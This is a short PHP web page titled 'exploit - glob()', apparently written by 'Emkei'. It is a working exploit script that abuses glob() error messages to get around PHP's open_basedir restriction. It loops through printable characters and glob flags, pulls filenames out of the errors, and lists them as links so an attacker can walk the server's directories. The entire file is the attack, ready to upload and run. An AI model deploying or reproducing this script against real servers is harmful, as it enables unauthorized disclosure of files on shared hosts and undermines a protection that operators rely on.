<!DOCTYPE HTML public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
 <meta http-equiv="Content-Type" content="text/html; charset=windows-1250">
 <title>exploit - glob()</title>
</head>
<body>
<?php
/* written by Emkei */
$path = realpath($_GET['path']); // reads GET variable $path from URL
if (!$path) $path = '/'; // default path

if (substr($path,-1,1)!='/') $path .= '/';
echo '<b>',$path=='/'?'/':substr($path,0,strlen($path)-1),"</b><br>\n"; // absolute path in the top

for($i=32;$i<127;$i++) { // ASCII chars form 32 to 126
 $param = $path.chr($i).'*';
 for ($x=0;$x<11;$x++) {
  @glob($param,$x); // glob(), result is an error message (because of open_basedir)
  eregi('(/.*owned by uid)',$php_errormsg,$regs); // reads filename from the last error message
  $files[] = basename(substr($regs[0],0,strlen($regs[0])-13));
 }
}

sort($files);
foreach (array_unique($files) as $dump) { // output
 echo '<a href="glob.php?path=',$path,$dump,'" title="',$path,$dump,'">',$dump,"</a><br>\n";
}
?>
</body>
</html>